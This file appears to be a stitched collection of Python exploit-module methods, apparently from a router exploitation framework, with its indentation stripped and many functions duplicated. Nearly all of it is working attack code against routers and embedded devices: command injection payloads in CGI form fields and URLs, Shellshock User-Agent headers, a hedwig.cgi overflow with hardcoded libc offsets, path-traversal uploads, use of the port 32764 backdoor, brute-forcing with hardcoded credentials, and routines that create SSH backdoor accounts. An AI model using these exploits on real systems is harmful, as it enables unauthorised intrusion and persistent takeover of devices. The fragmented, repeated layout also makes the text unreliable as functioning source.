def check(self):
number = int(random_text(6, alph=string.digits))
solution = number - 1
cmd = "echo $(({}-1))".format(number)
marker = random_text(32)
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
for payload in self.payloads:
injection = payload.replace("{{marker}}",
marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method,
url=url,
headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
return False # target not vulnerable
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {
"submit_button":
"Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"action": "",
"commit": "0",
"ping_ip": "127.0.0.1",
"ping_size": "&" + cmd,
"ping_times": "5",
"traceroute_ip": "127.0.0.1"
}
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
if response is None:
return False # target is not vulnerable
if mark in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def execute(self, cmd):
url = "{}:{}/cgi-bin/proxy.cgi".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded',
u'Referer': url}
payload = "||{};#".format(cmd)
data = {"NCSA_USERNAME": random_text(12),
"NCSA_GROUP": "standard",
"NCSA_PASS": payload,
"NCSA_PASS_CONFIRM": payload,
"SUBMIT": "Create+user",
"ACTION": "Add",
"NCSA_MIN_PASS_LEN": "6"}
response = http_request(method="POST", url=url, headers=headers, data=data, auth=(self.username, self.password), timeout=10)
if response is None:
return ""
end = response.text.find("<!DOCTYPE html>")
if end:
return response.text[:end]
return ""
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
data = {
"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"action": "",
"commit": "0",
"ping_ip": "127.0.0.1",
"ping_size": "&" + cmd,
"ping_times": "5",
"traceroute_ip": "127.0.0.1"
}
response = http_request(method="POST",
url=url,
data=data,
auth=(self.username, self.password))
if response is None:
return False # target is not vulnerable
if mark in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
fingerprint = random_text(10)
cmd = "echo {}".format(fingerprint)
response = self.execute(cmd)
if fingerprint in response:
return True
return False
def check(self):
fingerprint = random_text(10)
cmd = "echo {}".format(fingerprint)
response = self.execute(cmd)
if fingerprint in response:
return True
return False
def check(self):
marker = random_text(32)
cmd = "echo {}".format(marker)
response = self.execute(cmd)
if marker in response:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
marker = random_text(32)
cmd = "echo {}".format(marker)
response = self.execute(cmd)
if marker in response:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
url = "{}:{}/img/favicon.png?v=6.0.1-1213".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
target = self.target.replace("http://", "").replace("https://", "")
try:
ssh.connect(target, 22, timeout=5, username=random_text(8), password=random_text(8))
except paramiko.AuthenticationException:
return True # target is vulnerable
except:
pass
return False # target is not vulnerable
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True
return False
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True
return False
def run(self):
self.session = requests.Session()
if self.check():
print_success("Target seems to be vulnerable")
if self.login():
if not self.newusername:
self.newusername = random_text(8)
if not self.newpassword:
self.newpassword = random_text(8)
self.create_ssh_backdoor(self.newusername, self.newpassword)
# Log into the SSH backdoor account
self.init_ssh_session(self.newusername, self.newpassword)
else:
print_error("Exploit failed. Could not log in")
else:
print_error("Exploit failed. Target seems to be not vulnerable.")
def run(self):
self.session = requests.Session()
if self.check():
print_success("Target seems to be vulnerable")
if self.login():
if not self.newusername:
self.newusername = random_text(8)
if not self.newpassword:
self.newpassword = random_text(8)
self.create_ssh_backdoor(self.newusername, self.newpassword)
# Log into the SSH backdoor account
self.init_ssh_session(self.newusername, self.newpassword)
else:
print_error("Exploit failed. Could not log in")
else:
print_error("Exploit failed. Target seems to be not vulnerable.")
def check(self):
"""
Method that verifies if the target is vulnerable.
"""
rand_marker = random_text(6)
command = "echo {}".format(rand_marker)
if rand_marker in self.execute(command):
return True
return False
def execute2(self, cmd):
print_status("Trying authenticated commad injection vulnerability...")
# Iterate through hardcoded credentials and these provided by the user
for creds in set(self.creds + [(self.username, self.password)]):
print_status("Trying exploitation with creds: {}:{}".format(creds[0], creds[1]))
# Fixate cookie
url = "{}:{}/".format(self.target, self.port)
cookies = {
"SESSIONID": random_text(8)
}
response = http_request(method="GET", url=url, cookies=cookies, auth=(creds[0], creds[1]))
if response is None:
return False
# Inject command
url = "{}:{}/cgi-bin/tools_time.asp".format(self.target, self.port)
payload = "\"%3b{}%26%23".format(cmd)
data = {"SaveTime": "1",
"uiCurrentTime2": "",
"uiCurrentTime1": "",
"ToolsTimeSetFlag": "0",
"uiRadioValue": "0",
"uiClearPCSyncFlag": "0",
"uiwPCdateMonth": "0",
"uiwPCdateDay": "",
"&uiwPCdateYear": "",
"uiwPCdateHour": "",
"uiwPCdateMinute": "",
"uiwPCdateSec": "",
"uiCurTime": "N/A+(NTP+server+is+connecting)",
"uiTimezoneType": "0",
"uiViewSyncWith": "0",
"uiPCdateMonth": "1",
"uiPCdateDay": "",
"uiPCdateYear": "",
"uiPCdateHour": "",
"uiPCdateMinute": "",
"uiPCdateSec": "",
"uiViewdateToolsTZ": "GMT+07:00",
"uiViewdateDS": "Disable",
"uiViewSNTPServer": payload,
"ntp2ServerFlag": "N/A",
"ntp3ServerFlag": "N/A"}
response = http_request(method="POST", url=url, cookies=cookies, data=data, auth=(creds[0], creds[1]))
if response is None:
return False
return True
def execute2(self, cmd):
print_status("Trying authenticated commad injection vulnerability...")
# Iterate through hardcoded credentials and these provided by the user
for creds in set(self.creds + [(self.username, self.password)]):
print_status("Trying exploitation with creds: {}:{}".format(creds[0], creds[1]))
# Fixate cookie
url = "{}:{}/".format(self.target, self.port)
cookies = {
"SESSIONID": random_text(8)
}
response = http_request(method="GET", url=url, cookies=cookies, auth=(creds[0], creds[1]))
if response is None:
return False
# Inject command
url = "{}:{}/cgi-bin/tools_time.asp".format(self.target, self.port)
payload = "\"%3b{}%26%23".format(cmd)
data = {"SaveTime": "1",
"uiCurrentTime2": "",
"uiCurrentTime1": "",
"ToolsTimeSetFlag": "0",
"uiRadioValue": "0",
"uiClearPCSyncFlag": "0",
"uiwPCdateMonth": "0",
"uiwPCdateDay": "",
"&uiwPCdateYear": "",
"uiwPCdateHour": "",
"uiwPCdateMinute": "",
"uiwPCdateSec": "",
"uiCurTime": "N/A+(NTP+server+is+connecting)",
"uiTimezoneType": "0",
"uiViewSyncWith": "0",
"uiPCdateMonth": "1",
"uiPCdateDay": "",
"uiPCdateYear": "",
"uiPCdateHour": "",
"uiPCdateMinute": "",
"uiPCdateSec": "",
"uiViewdateToolsTZ": "GMT+07:00",
"uiViewdateDS": "Disable",
"uiViewSNTPServer": payload,
"ntp2ServerFlag": "N/A",
"ntp3ServerFlag": "N/A"}
response = http_request(method="POST", url=url, cookies=cookies, data=data, auth=(creds[0], creds[1]))
if response is None:
return False
return True
def execute(self, cmd):
libcbase = 0x2aaf8000
system = 0x000531FF
calcsystem = 0x000158C8
callsystem = 0x000159CC
shellcode = random_text(973)
shellcode += struct.pack("<I", libcbase + system)
shellcode += random_text(16)
shellcode += struct.pack("<I", libcbase + callsystem)
shellcode += random_text(12)
shellcode += struct.pack("<I", libcbase + calcsystem)
shellcode += random_text(16)
shellcode += cmd
url = "{}:{}/hedwig.cgi".format(self.target, self.port)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'uid': shellcode}
data = random_text(7) + "=" + random_text(7)
response = http_request(method="POST",
url=url,
headers=headers,
data=data,
cookies=cookies)
if response is None:
return ""
return response.text[response.text.find("</hedwig>") +
len("</hedwig>"):].strip()
def check(self):
base_url = sanitize_url('{0}:{1}/'.format(self.target, self.port))
upload_url = base_url + 'login.cgi'
response = http_request(url=upload_url, method='GET')
if (response is None):
return False #Target not vulnerable
rand_str = random_text(length=16)
tmp_payload = tempfile.TemporaryFile()
tmp_payload.write('vulnerable' + rand_str)
tmp_payload.seek(0)
upload_params = {
'file': ('../../../../tmp/airview.uavr', tmp_payload, {
'Expect': ''
})
}
response = http_request(url=upload_url,
method='POST',
files=upload_params)
tmp_payload.close()
if (response is None):
return False #Target not vulnerable
#Response to verify if the upload was done correctly
airview_url = base_url + 'airview.uavr'
verify_upload = http_request(url=airview_url, method='GET')
#Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.seek(0)
upload_params = {
'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {
'Expect': ''
})
}
http_request(url=upload_url, method='POST', files=upload_params)
clean_tmp_file.close()
if ('vulnerable' + rand_str in verify_upload.text):
return True
else:
return False
def check(self):
NUM_CHECKS = 5 # we try 5 times because the exploit tends to be unstable
for _ in range(NUM_CHECKS):
random_value = random_text(32)
cmd = "echo {}".format(random_value)
try:
retval = self.execute(cmd)
except socket.timeout:
continue
if random_value in retval:
return True
return False
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if mark in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if mark in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
NUM_CHECKS = 5 # we try 5 times because the exploit tends to be unstable
for _ in range(NUM_CHECKS):
random_value = random_text(32)
cmd = "echo {}".format(random_value)
try:
retval = self.execute(cmd)
except socket.timeout:
continue
if random_value in retval:
return True
return False
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and mark in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
url = "{}:{}/utility.cgi?testType=1&IP=aaa".format(self.target, self.port)
response1 = http_request(method="GET", url=url)
if response1 is None:
return False # target is not vulnerable
if response1.status_code == 200:
url = "{}:{}/{}.cgi".format(self.target, self.port, random_text(32))
response2 = http_request(method="GET", url=url)
if response2 is None or response1.text != response2.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
try:
s.connect((self.target, 32764))
except socket.error:
return False # target is not vulnerable
s.send(random_text(12))
r = s.recv(0xC)
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
sig, ret_val, ret_len = struct.unpack('<III', r)
if sig == 0x53634D4D:
self.endianness = "<"
elif sig == 0x4D4D6353:
self.endianness = ">"
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((self.target, 32764))
mark = random_text(32)
cmd = 'echo "{}"'.format(mark)
response = self.execute(s, 7, cmd)
s.close()
if mark in response:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
try:
s.connect((self.target, 32764))
except socket.error:
return False # target is not vulnerable
s.send(random_text(12))
r = s.recv(0xC)
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
sig, ret_val, ret_len = struct.unpack('<III', r)
if sig == 0x53634D4D:
self.endianness = "<"
elif sig == 0x4D4D6353:
self.endianness = ">"
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((self.target, 32764))
mark = random_text(32)
cmd = 'echo "{}"'.format(mark)
response = self.execute(s, 7, cmd)
s.close()
if mark in response:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
number = int(random_text(6, alph=string.digits))
solution = number - 1
cmd = "echo $(({}-1))".format(number)
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and str(solution) in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
number = int(random_text(6, alph=string.digits))
solution = number - 1
cmd = "echo $(({}-1))".format(number)
marker = random_text(32)
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
return False # target not vulnerable
def check(self):
number = int(random_text(6, alph=string.digits))
solution = number - 1
cmd = "echo $(({}-1))".format(number)
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and str(solution) in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
number = int(random_text(6, alph=string.digits))
solution = number - 1
cmd = "echo $(({}-1))".format(number)
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and str(solution) in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
url = "{}:{}/utility.cgi?testType=1&IP=aaa".format(
self.target, self.port)
response1 = http_request(method="GET", url=url)
if response1 is None:
return False # target is not vulnerable
if response1.status_code == 200:
url = "{}:{}/{}.cgi".format(self.target, self.port,
random_text(32))
response2 = http_request(method="GET", url=url)
if response2 is None or response1.text != response2.text:
return True # target is vulnerable
return False # target is not vulnerable
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)
response = http_request(method="GET", url=url)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark))
response = http_request(method="GET", url=url)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/login_handler.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
marker = random_text(16)
cmd = cmd.replace(" ", "+")
payload = "echo+{};{};echo+{};".format(marker, cmd, marker)
inj = self.valid.format(payload)
url = "{}:{}{}".format(self.target, self.port, inj)
response = http_request(method="GET", url=url)
if response is None:
return ""
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
for resource in self.resources:
url = ("{}:{}/{}?writeData=true®info=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, resource, cmd))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200:
response_body = response.text
if "Update Success!" in response_body and mark in response_body:
self.valid_resource = resource
return True # target is vulnerable
return False # target is not vulnerable
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return ""
if mark in response.text:
regexp = "%s(|.+?)%s" % (mark, mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def check(self):
url = "{}:{}/cgi-bin/index.cgi".format(self.target, self.port)
marker = random_text(32)
cmd = "echo {}".format(marker)
payload = self.payload.replace("{{cmd}}", cmd)
headers = {
'VULN': payload,
}
response = http_request(method="GET", url=url, headers=headers, auth=(self.username, self.password))
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and marker in response.text:
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
for resource in self.resources:
url = ("{}:{}/{}?writeData=true®info=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, resource, cmd))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200:
response_body = response.text
if "Update Success!" in response_body and mark in response_body:
self.valid_resource = resource
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
base_url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
upload_url = base_url + 'login.cgi'
response = http_request(url=upload_url, method='GET')
if(response is None):
return False #Target not vulnerable
rand_str = random_text(length=16)
tmp_payload = tempfile.TemporaryFile()
tmp_payload.write('vulnerable' + rand_str)
tmp_payload.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
response = http_request(url=upload_url, method='POST', files=upload_params)
tmp_payload.close()
if(response is None):
return False #Target not vulnerable
#Response to verify if the upload was done correctly
airview_url = base_url + 'airview.uavr'
verify_upload = http_request(url=airview_url, method='GET')
#Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
http_request(url=upload_url, method='POST', files=upload_params)
clean_tmp_file.close()
if('vulnerable'+rand_str in verify_upload.text):
return True
else:
return False
def execute(self, cmd):
marker = random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
return
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
else:
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
headers = {
"User-Agent":
'() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;'
% (mark, cmd, mark)
}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return ""
if mark in response.text:
regexp = "%s(|.+?)%s" % (mark, mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
marker = random_text(32)
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
return
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
else:
return ""
def execute(self, cmd):
url = "{}:{}/cgi-bin/index.cgi".format(self.target, self.port)
marker = random_text(32)
cmd = "echo {};{};echo{}".format(marker, cmd, marker)
payload = self.payload.replace("{{cmd}}", cmd)
headers = {
'VULN': payload,
}
response = http_request(method="GET", url=url, headers=headers, auth=(self.username, self.password))
if response is None:
return ""
if response.status_code == 200:
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
end = response.text.find(marker, start) - 48
return response.text[start:end]
return ""
def check(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
try:
s.connect((self.target, 32764))
except socket.error:
return False # target is not vulnerable
s.send(random_text(12))
r = s.recv(0xC)
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
sig, ret_val, ret_len = struct.unpack('<III', r)
if sig == 0x53634D4D:
self.endianness = "<"
elif sig == 0x4D4D6353:
self.endianness = ">"
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((self.target, 32764))
conf = self.execute(s, 1)
s.close()
lines = re.split("\x00|\x01", conf)
if len(lines):
return True # target is vulnerable
return False # target is not vulnerable
def check(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
try:
s.connect((self.target, 32764))
except socket.error:
return False # target is not vulnerable
s.send(random_text(12))
r = s.recv(0xC)
while len(r) < 0xC:
tmp = s.recv(0xC - len(r))
r += tmp
sig, ret_val, ret_len = struct.unpack('<III', r)
if sig == 0x53634D4D:
self.endianness = "<"
elif sig == 0x4D4D6353:
self.endianness = ">"
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((self.target, 32764))
conf = self.execute(s, 1)
s.close()
lines = re.split("\x00|\x01", conf)
if len(lines):
return True # target is vulnerable
return False # target is not vulnerable
def execute(self, cmd):
libcbase = 0x2aaf8000
system = 0x000531FF
calcsystem = 0x000158C8
callsystem = 0x000159CC
shellcode = random_text(973)
shellcode += struct.pack("<I", libcbase + system)
shellcode += random_text(16)
shellcode += struct.pack("<I", libcbase + callsystem)
shellcode += random_text(12)
shellcode += struct.pack("<I", libcbase + calcsystem)
shellcode += random_text(16)
shellcode += cmd
url = "{}:{}/hedwig.cgi".format(self.target, self.port)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'uid': shellcode}
data = random_text(7) + "=" + random_text(7)
response = http_request(method="POST", url=url, headers=headers, data=data, cookies=cookies)
if response is None:
return ""
return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
